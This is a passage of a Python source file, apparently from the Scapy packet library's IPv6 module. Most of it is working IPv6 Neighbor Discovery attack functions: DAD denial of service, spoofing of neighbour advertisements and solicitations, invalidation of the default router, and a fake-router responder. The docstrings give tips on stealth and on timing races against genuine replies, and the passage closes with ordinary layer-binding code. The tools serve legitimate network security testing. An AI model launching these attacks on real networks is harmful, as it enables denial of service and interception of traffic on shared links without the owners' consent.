3526        print("Reply NS for target address %s (received from %s)" % (tgt, mac))
3527
3528    _NDP_Attack_DAD_DoS(ns_reply_callback, iface, mac_src_filter,
3529                        tgt_filter, reply_mac)
3530
3531
3532def NDP_Attack_DAD_DoS_via_NA(iface=None, mac_src_filter=None, tgt_filter=None,
3533                              reply_mac=None):
3534    """
3535    Perform the DAD DoS attack using NS described in section 4.1.3 of RFC
3536    3756. This is done by listening incoming NS messages *sent from the
3537    unspecified address* and sending a NA reply for the target address,
3538    leading the peer to believe that another node is also performing DAD
3539    for that address.
3540
3541    By default, the fake NA sent to create the DoS uses:
3542     - as target address the target address found in received NS.
3543     - as IPv6 source address: the target address found in received NS.
3544     - as IPv6 destination address: the link-local solicited-node multicast
3545       address derived from the target address in received NS.
3546     - the mac address of the interface as source (or reply_mac, see below).
3547     - the multicast mac address derived from the solicited node multicast
3548       address used as IPv6 destination address.
3549     - A Target Link-Layer address option (ICMPv6NDOptDstLLAddr) filled
3550       with the mac address used as source of the NA.
3551
3552    Following arguments can be used to change the behavior:
3553
3554    iface: a specific interface (e.g. "eth0") of the system on which the
3555          DoS should be launched. If None is provided conf.iface is used.
3556
3557    mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on.
3558         Only NS messages received from this source will trigger replies.
3559         This allows limiting the effects of the DoS to a single target by
3560         filtering on its mac address. The default value is None: the DoS
3561         is not limited to a specific mac address.
3562
3563    tgt_filter: Same as previous but for a specific target IPv6 address for
3564         received NS. If the target address in the NS message (not the IPv6
3565         destination address) matches that address, then a fake reply will
3566         be sent, i.e. the emitter will be a target of the DoS.
3567
3568    reply_mac: allow specifying a specific source mac address for the reply,
3569         i.e. to prevent the use of the mac address of the interface. This
3570         address will also be used in the Target Link-Layer Address option.
3571    """
3572
3573    def na_reply_callback(req, reply_mac, iface):
3574        """
3575        Callback that reply to a NS with a NA
3576        """
3577
3578        # Let's build a reply and send it
3579        mac = req[Ether].src
3580        dst = req[IPv6].dst
3581        tgt = req[ICMPv6ND_NS].tgt
3582        rep = Ether(src=reply_mac) / IPv6(src=tgt, dst=dst)
3583        rep /= ICMPv6ND_NA(tgt=tgt, S=0, R=0, O=1)  # noqa: E741
3584        rep /= ICMPv6NDOptDstLLAddr(lladdr=reply_mac)
3585        sendp(rep, iface=iface, verbose=0)
3586
3587        print("Reply NA for target address %s (received from %s)" % (tgt, mac))
3588
3589    _NDP_Attack_DAD_DoS(na_reply_callback, iface, mac_src_filter,
3590                        tgt_filter, reply_mac)
3591
3592
3593def NDP_Attack_NA_Spoofing(iface=None, mac_src_filter=None, tgt_filter=None,
3594                           reply_mac=None, router=False):
3595    """
3596    The main purpose of this function is to send fake Neighbor Advertisement
3597    messages to a victim. As the emission of unsolicited Neighbor Advertisement
3598    is pretty pointless (from an attacker standpoint) because it will not
3599    lead to a modification of a victim's neighbor cache, the function send
3600    advertisements in response to received NS (NS sent as part of the DAD,
3601    i.e. with an unspecified address as source, are not considered).
3602
3603    By default, the fake NA sent to create the DoS uses:
3604     - as target address the target address found in received NS.
3605     - as IPv6 source address: the target address
3606     - as IPv6 destination address: the source IPv6 address of received NS
3607       message.
3608     - the mac address of the interface as source (or reply_mac, see below).
3609     - the source mac address of the received NS as destination macs address
3610       of the emitted NA.
3611     - A Target Link-Layer address option (ICMPv6NDOptDstLLAddr)
3612       filled with the mac address used as source of the NA.
3613
3614    Following arguments can be used to change the behavior:
3615
3616    iface: a specific interface (e.g. "eth0") of the system on which the
3617          DoS should be launched. If None is provided conf.iface is used.
3618
3619    mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on.
3620         Only NS messages received from this source will trigger replies.
3621         This allows limiting the effects of the DoS to a single target by
3622         filtering on its mac address. The default value is None: the DoS
3623         is not limited to a specific mac address.
3624
3625    tgt_filter: Same as previous but for a specific target IPv6 address for
3626         received NS. If the target address in the NS message (not the IPv6
3627         destination address) matches that address, then a fake reply will
3628         be sent, i.e. the emitter will be a target of the DoS.
3629
3630    reply_mac: allow specifying a specific source mac address for the reply,
3631         i.e. to prevent the use of the mac address of the interface. This
3632         address will also be used in the Target Link-Layer Address option.
3633
3634    router: by the default (False) the 'R' flag in the NA used for the reply
3635         is not set. If the parameter is set to True, the 'R' flag in the
3636         NA is set, advertising us as a router.
3637
3638    Please, keep the following in mind when using the function: for obvious
3639    reasons (kernel space vs. Python speed), when the target of the address
3640    resolution is on the link, the sender of the NS receives 2 NA messages
3641    in a row, the valid one and our fake one. The second one will overwrite
3642    the information provided by the first one, i.e. the natural latency of
3643    Scapy helps here.
3644
3645    In practice, on a common Ethernet link, the emission of the NA from the
3646    genuine target (kernel stack) usually occurs in the same millisecond as
3647    the receipt of the NS. The NA generated by Scapy6 will usually come after
3648    something 20+ ms. On a usual testbed for instance, this difference is
3649    sufficient to have the first data packet sent from the victim to the
3650    destination before it even receives our fake NA.
3651    """
3652
3653    def is_request(req, mac_src_filter, tgt_filter):
3654        """
3655        Check if packet req is a request
3656        """
3657
3658        # Those simple checks are based on Section 5.4.2 of RFC 4862
3659        if not (Ether in req and IPv6 in req and ICMPv6ND_NS in req):
3660            return 0
3661
3662        mac_src = req[Ether].src
3663        if mac_src_filter and mac_src != mac_src_filter:
3664            return 0
3665
3666        # Source must NOT be the unspecified address
3667        if req[IPv6].src == "::":
3668            return 0
3669
3670        tgt = inet_pton(socket.AF_INET6, req[ICMPv6ND_NS].tgt)
3671        if tgt_filter and tgt != tgt_filter:
3672            return 0
3673
3674        dst = req[IPv6].dst
3675        if in6_isllsnmaddr(dst):  # Address is Link Layer Solicited Node mcast.
3676
3677            # If this is a real address resolution NS, then the destination
3678            # address of the packet is the link-local solicited node multicast
3679            # address associated with the target of the NS.
3680            # Otherwise, the NS is a NUD related one, i.e. the peer is
3681            # unicasting the NS to check the target is still alive (L2
3682            # information is still in its cache and it is verified)
3683            received_snma = inet_pton(socket.AF_INET6, dst)
3684            expected_snma = in6_getnsma(tgt)
3685            if received_snma != expected_snma:
3686                print("solicited node multicast @ does not match target @!")
3687                return 0
3688
3689        return 1
3690
3691    def reply_callback(req, reply_mac, router, iface):
3692        """
3693        Callback that reply to a NS with a spoofed NA
3694        """
3695
3696        # Let's build a reply (as defined in Section 7.2.4. of RFC 4861) and
3697        # send it back.
3698        mac = req[Ether].src
3699        pkt = req[IPv6]
3700        src = pkt.src
3701        tgt = req[ICMPv6ND_NS].tgt
3702        rep = Ether(src=reply_mac, dst=mac) / IPv6(src=tgt, dst=src)
3703        # Use the target field from the NS
3704        rep /= ICMPv6ND_NA(tgt=tgt, S=1, R=router, O=1)  # noqa: E741
3705
3706        # "If the solicitation IP Destination Address is not a multicast
3707        # address, the Target Link-Layer Address option MAY be omitted"
3708        # Given our purpose, we always include it.
3709        rep /= ICMPv6NDOptDstLLAddr(lladdr=reply_mac)
3710
3711        sendp(rep, iface=iface, verbose=0)
3712
3713        print("Reply NA for target address %s (received from %s)" % (tgt, mac))
3714
3715    if not iface:
3716        iface = conf.iface
3717    # To prevent sniffing our own traffic
3718    if not reply_mac:
3719        reply_mac = get_if_hwaddr(iface)
3720    sniff_filter = "icmp6 and not ether src %s" % reply_mac
3721
3722    router = 1 if router else 0  # Value of the R flags in NA
3723
3724    sniff(store=0,
3725          filter=sniff_filter,
3726          lfilter=lambda x: is_request(x, mac_src_filter, tgt_filter),
3727          prn=lambda x: reply_callback(x, reply_mac, router, iface),
3728          iface=iface)
3729
3730
3731def NDP_Attack_NS_Spoofing(src_lladdr=None, src=None, target="2001:db8::1",
3732                           dst=None, src_mac=None, dst_mac=None, loop=True,
3733                           inter=1, iface=None):
3734    """
3735    The main purpose of this function is to send fake Neighbor Solicitations
3736    messages to a victim, in order to either create a new entry in its neighbor
3737    cache or update an existing one. In section 7.2.3 of RFC 4861, it is stated
3738    that a node SHOULD create the entry or update an existing one (if it is not
3739    currently performing DAD for the target of the NS). The entry's reachability  # noqa: E501
3740    state is set to STALE.
3741
3742    The two main parameters of the function are the source link-layer address
3743    (carried by the Source Link-Layer Address option in the NS) and the
3744    source address of the packet.
3745
3746    Unlike some other NDP_Attack_* function, this one is not based on a
3747    stimulus/response model. When called, it sends the same NS packet in loop
3748    every second (the default)
3749
3750    Following arguments can be used to change the format of the packets:
3751
3752    src_lladdr: the MAC address used in the Source Link-Layer Address option
3753         included in the NS packet. This is the address that the peer should
3754         associate in its neighbor cache with the IPv6 source address of the
3755         packet. If None is provided, the mac address of the interface is
3756         used.
3757
3758    src: the IPv6 address used as source of the packet. If None is provided,
3759         an address associated with the emitting interface will be used
3760         (based on the destination address of the packet).
3761
3762    target: the target address of the NS packet. If no value is provided,
3763         a dummy address (2001:db8::1) is used. The value of the target
3764         has a direct impact on the destination address of the packet if it
3765         is not overridden. By default, the solicited-node multicast address
3766         associated with the target is used as destination address of the
3767         packet. Consider specifying a specific destination address if you
3768         intend to use a target address different than the one of the victim.
3769
3770    dst: The destination address of the NS. By default, the solicited node
3771         multicast address associated with the target address (see previous
3772         parameter) is used if no specific value is provided. The victim
3773         is not expected to check the destination address of the packet,
3774         so using a multicast address like ff02::1 should work if you want
3775         the attack to target all hosts on the link. On the contrary, if
3776         you want to be more stealth, you should provide the target address
3777         for this parameter in order for the packet to be sent only to the
3778         victim.
3779
3780    src_mac: the MAC address used as source of the packet. By default, this
3781         is the address of the interface. If you want to be more stealth,
3782         feel free to use something else. Note that this address is not the
3783         that the victim will use to populate its neighbor cache.
3784
3785    dst_mac: The MAC address used as destination address of the packet. If
3786         the IPv6 destination address is multicast (all-nodes, solicited
3787         node, ...), it will be computed. If the destination address is
3788         unicast, a neighbor solicitation will be performed to get the
3789         associated address. If you want the attack to be stealth, you
3790         can provide the MAC address using this parameter.
3791
3792    loop: By default, this parameter is True, indicating that NS packets
3793         will be sent in loop, separated by 'inter' seconds (see below).
3794         When set to False, a single packet is sent.
3795
3796    inter: When loop parameter is True (the default), this parameter provides
3797         the interval in seconds used for sending NS packets.
3798
3799    iface: to force the sending interface.
3800    """
3801
3802    if not iface:
3803        iface = conf.iface
3804
3805    # Use provided MAC address as source link-layer address option
3806    # or the MAC address of the interface if none is provided.
3807    if not src_lladdr:
3808        src_lladdr = get_if_hwaddr(iface)
3809
3810    # Prepare packets parameters
3811    ether_params = {}
3812    if src_mac:
3813        ether_params["src"] = src_mac
3814
3815    if dst_mac:
3816        ether_params["dst"] = dst_mac
3817
3818    ipv6_params = {}
3819    if src:
3820        ipv6_params["src"] = src
3821    if dst:
3822        ipv6_params["dst"] = dst
3823    else:
3824        # Compute the solicited-node multicast address
3825        # associated with the target address.
3826        tmp = inet_ntop(socket.AF_INET6,
3827                        in6_getnsma(inet_pton(socket.AF_INET6, target)))
3828        ipv6_params["dst"] = tmp
3829
3830    pkt = Ether(**ether_params)
3831    pkt /= IPv6(**ipv6_params)
3832    pkt /= ICMPv6ND_NS(tgt=target)
3833    pkt /= ICMPv6NDOptSrcLLAddr(lladdr=src_lladdr)
3834
3835    sendp(pkt, inter=inter, loop=loop, iface=iface, verbose=0)
3836
3837
3838def NDP_Attack_Kill_Default_Router(iface=None, mac_src_filter=None,
3839                                   ip_src_filter=None, reply_mac=None,
3840                                   tgt_mac=None):
3841    """
3842    The purpose of the function is to monitor incoming RA messages
3843    sent by default routers (RA with a non-zero Router Lifetime values)
3844    and invalidate them by immediately replying with fake RA messages
3845    advertising a zero Router Lifetime value.
3846
3847    The result on receivers is that the router is immediately invalidated,
3848    i.e. the associated entry is discarded from the default router list
3849    and destination cache is updated to reflect the change.
3850
3851    By default, the function considers all RA messages with a non-zero
3852    Router Lifetime value but provides configuration knobs to allow
3853    filtering RA sent by specific routers (Ethernet source address).
3854    With regard to emission, the multicast all-nodes address is used
3855    by default but a specific target can be used, in order for the DoS to
3856    apply only to a specific host.
3857
3858    More precisely, following arguments can be used to change the behavior:
3859
3860    iface: a specific interface (e.g. "eth0") of the system on which the
3861         DoS should be launched. If None is provided conf.iface is used.
3862
3863    mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on.
3864         Only RA messages received from this source will trigger replies.
3865         If other default routers advertised their presence on the link,
3866         their clients will not be impacted by the attack. The default
3867         value is None: the DoS is not limited to a specific mac address.
3868
3869    ip_src_filter: an IPv6 address (e.g. fe80::21e:bff:fe4e:3b2) to filter
3870         on. Only RA messages received from this source address will trigger
3871         replies. If other default routers advertised their presence on the
3872         link, their clients will not be impacted by the attack. The default
3873         value is None: the DoS is not limited to a specific IPv6 source
3874         address.
3875
3876    reply_mac: allow specifying a specific source mac address for the reply,
3877         i.e. to prevent the use of the mac address of the interface.
3878
3879    tgt_mac: allow limiting the effect of the DoS to a specific host,
3880         by sending the "invalidating RA" only to its mac address.
3881    """
3882
3883    def is_request(req, mac_src_filter, ip_src_filter):
3884        """
3885        Check if packet req is a request
3886        """
3887
3888        if not (Ether in req and IPv6 in req and ICMPv6ND_RA in req):
3889            return 0
3890
3891        mac_src = req[Ether].src
3892        if mac_src_filter and mac_src != mac_src_filter:
3893            return 0
3894
3895        ip_src = req[IPv6].src
3896        if ip_src_filter and ip_src != ip_src_filter:
3897            return 0
3898
3899        # Check if this is an advertisement for a Default Router
3900        # by looking at Router Lifetime value
3901        if req[ICMPv6ND_RA].routerlifetime == 0:
3902            return 0
3903
3904        return 1
3905
3906    def ra_reply_callback(req, reply_mac, tgt_mac, iface):
3907        """
3908        Callback that sends an RA with a 0 lifetime
3909        """
3910
3911        # Let's build a reply and send it
3912
3913        src = req[IPv6].src
3914
3915        # Prepare packets parameters
3916        ether_params = {}
3917        if reply_mac:
3918            ether_params["src"] = reply_mac
3919
3920        if tgt_mac:
3921            ether_params["dst"] = tgt_mac
3922
3923        # Basis of fake RA (high pref, zero lifetime)
3924        rep = Ether(**ether_params) / IPv6(src=src, dst="ff02::1")
3925        rep /= ICMPv6ND_RA(prf=1, routerlifetime=0)
3926
3927        # Add it a PIO from the request ...
3928        tmp = req
3929        while ICMPv6NDOptPrefixInfo in tmp:
3930            pio = tmp[ICMPv6NDOptPrefixInfo]
3931            tmp = pio.payload
3932            del(pio.payload)
3933            rep /= pio
3934
3935        # ... and source link layer address option
3936        if ICMPv6NDOptSrcLLAddr in req:
3937            mac = req[ICMPv6NDOptSrcLLAddr].lladdr
3938        else:
3939            mac = req[Ether].src
3940        rep /= ICMPv6NDOptSrcLLAddr(lladdr=mac)
3941
3942        sendp(rep, iface=iface, verbose=0)
3943
3944        print("Fake RA sent with source address %s" % src)
3945
3946    if not iface:
3947        iface = conf.iface
3948    # To prevent sniffing our own traffic
3949    if not reply_mac:
3950        reply_mac = get_if_hwaddr(iface)
3951    sniff_filter = "icmp6 and not ether src %s" % reply_mac
3952
3953    sniff(store=0,
3954          filter=sniff_filter,
3955          lfilter=lambda x: is_request(x, mac_src_filter, ip_src_filter),
3956          prn=lambda x: ra_reply_callback(x, reply_mac, tgt_mac, iface),
3957          iface=iface)
3958
3959
3960def NDP_Attack_Fake_Router(ra, iface=None, mac_src_filter=None,
3961                           ip_src_filter=None):
3962    """
3963    The purpose of this function is to send provided RA message at layer 2
3964    (i.e. providing a packet starting with IPv6 will not work) in response
3965    to received RS messages. In the end, the function is a simple wrapper
3966    around sendp() that monitor the link for RS messages.
3967
3968    It is probably better explained with an example:
3969
3970      >>> ra  = Ether()/IPv6()/ICMPv6ND_RA()
3971      >>> ra /= ICMPv6NDOptPrefixInfo(prefix="2001:db8:1::", prefixlen=64)
3972      >>> ra /= ICMPv6NDOptPrefixInfo(prefix="2001:db8:2::", prefixlen=64)
3973      >>> ra /= ICMPv6NDOptSrcLLAddr(lladdr="00:11:22:33:44:55")
3974      >>> NDP_Attack_Fake_Router(ra, iface="eth0")
3975      Fake RA sent in response to RS from fe80::213:58ff:fe8c:b573
3976      Fake RA sent in response to RS from fe80::213:72ff:fe8c:b9ae
3977      ...
3978
3979    Following arguments can be used to change the behavior:
3980
3981      ra: the RA message to send in response to received RS message.
3982
3983      iface: a specific interface (e.g. "eth0") of the system on which the
3984             DoS should be launched. If none is provided, conf.iface is
3985             used.
3986
3987      mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on.
3988         Only RS messages received from this source will trigger a reply.
3989         Note that no changes to provided RA is done which imply that if
3990         you intend to target only the source of the RS using this option,
3991         you will have to set the Ethernet destination address to the same
3992         value in your RA.
3993         The default value for this parameter is None: no filtering on the
3994         source of RS is done.
3995
3996    ip_src_filter: an IPv6 address (e.g. fe80::21e:bff:fe4e:3b2) to filter
3997         on. Only RS messages received from this source address will trigger
3998         replies. Same comment as for previous argument apply: if you use
3999         the option, you will probably want to set a specific Ethernet
4000         destination address in the RA.
4001    """
4002
4003    def is_request(req, mac_src_filter, ip_src_filter):
4004        """
4005        Check if packet req is a request
4006        """
4007
4008        if not (Ether in req and IPv6 in req and ICMPv6ND_RS in req):
4009            return 0
4010
4011        mac_src = req[Ether].src
4012        if mac_src_filter and mac_src != mac_src_filter:
4013            return 0
4014
4015        ip_src = req[IPv6].src
4016        if ip_src_filter and ip_src != ip_src_filter:
4017            return 0
4018
4019        return 1
4020
4021    def ra_reply_callback(req, iface):
4022        """
4023        Callback that sends an RA in reply to an RS
4024        """
4025
4026        src = req[IPv6].src
4027        sendp(ra, iface=iface, verbose=0)
4028        print("Fake RA sent in response to RS from %s" % src)
4029
4030    if not iface:
4031        iface = conf.iface
4032    sniff_filter = "icmp6"
4033
4034    sniff(store=0,
4035          filter=sniff_filter,
4036          lfilter=lambda x: is_request(x, mac_src_filter, ip_src_filter),
4037          prn=lambda x: ra_reply_callback(x, iface),
4038          iface=iface)
4039
4040#############################################################################
4041# Pre-load classes                                                         ##
4042#############################################################################
4043
4044
4045def _get_cls(name):
4046    return globals().get(name, Raw)
4047
4048
4049def _load_dict(d):
4050    for k, v in d.items():
4051        d[k] = _get_cls(v)
4052
4053
4054_load_dict(icmp6ndoptscls)
4055_load_dict(icmp6typescls)
4056_load_dict(ipv6nhcls)
4057
4058#############################################################################
4059#############################################################################
4060#                            Layers binding                                 #
4061#############################################################################
4062#############################################################################
4063
4064conf.l3types.register(ETH_P_IPV6, IPv6)
4065conf.l2types.register(31, IPv6)
4066conf.l2types.register(DLT_IPV6, IPv6)
4067conf.l2types.register(DLT_RAW, IPv46)
4068conf.l2types.register_num2layer(DLT_RAW_ALT, IPv46)
4069
4070bind_layers(Ether, IPv6, type=0x86dd)
4071bind_layers(CookedLinux, IPv6, proto=0x86dd)
4072bind_layers(GRE, IPv6, proto=0x86dd)
4073bind_layers(SNAP, IPv6, code=0x86dd)
4074bind_layers(Loopback, IPv6, type=socket.AF_INET6)
4075bind_layers(IPerror6, TCPerror, nh=socket.IPPROTO_TCP)
4076bind_layers(IPerror6, UDPerror, nh=socket.IPPROTO_UDP)
4077bind_layers(IPv6, TCP, nh=socket.IPPROTO_TCP)
4078bind_layers(IPv6, UDP, nh=socket.IPPROTO_UDP)
4079bind_layers(IP, IPv6, proto=socket.IPPROTO_IPV6)
4080bind_layers(IPv6, IPv6, nh=socket.IPPROTO_IPV6)
4081bind_layers(IPv6, IP, nh=socket.IPPROTO_IPIP)
4082bind_layers(IPv6, GRE, nh=socket.IPPROTO_GRE)
4083